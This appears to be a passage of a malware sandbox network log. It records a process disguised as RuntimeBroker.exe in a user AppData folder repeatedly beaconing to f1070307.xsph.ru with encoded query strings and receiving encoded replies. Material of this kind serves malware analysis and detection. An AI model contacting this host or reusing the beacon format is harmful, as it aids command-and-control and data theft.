Jan 3, 2025 00:28:00.104907036 CET	3887	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=d1nIiojIyMWY1QzN2QWMjdDMhRTZzI2MxUWNkZmYmFGOlRDOhFmIsIiNmFmY2gDOihDZ5QmZ2kDZzUGZ4ETYyE2YmVjY2gjNjRjMjZmNmlDOiojI0cDOwEGOygjM3EmZ2YmZmhDZhlDOwUmY5MGOwEWN4AjIsIiYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZiojIjdjNhFzMkFjYxQGOkJ2YwQTMmVzNwUjM5MDNzQGNyYjI7xSfiElZ5oUaUl2bqlEMVpmTqpkMNpmUH5EbWRlTyk0RPlmSq1EbkRVW1sGVadXS65UaadVTzsGVZRTQql1MrpmT4l0QMlGNrlkNJN0T5FlMZFTU6llerRVWqJEVZdXU6lVNBRkWtZ1VNhXRH1EenRVW3llMOBTVt5EaGdVW0Ukaal2dpl [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:00.781580925 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49807	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:06.041296005 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:06.721857071 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49842	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:11.741559982 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:12.433212996 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49877	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:17.445708036 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:18.193221092 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49916	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:23.242284060 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:23.960741043 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49947	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:29.127172947 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:29.812088966 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49982	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:34.834168911 CET	3933	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru Connection: Keep-Alive
Jan 3, 2025 00:28:35.528698921 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50015	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:40.840277910 CET	3933	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru Connection: Keep-Alive
Jan 3, 2025 00:28:41.551798105 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50022	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:46.569426060 CET	3906	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=0VfiIiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNisHL9JSUmljSpRVavpWSwUlaOpmSy0kaSdkTsZFVOJTSH9UaKpWTsRGVZVzaUp1dJpnTpp1VNNzaUlFNBpWWzsmaOhXSDxUa0sWS2k0QPlXUykVMRpXW6tGVZpmQUl1dRpXW1EERa1mVX1EeFdUT4dGVZdXWy4EMV1mToZ0VZRTRqpVa3lW [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru Connection: Keep-Alive
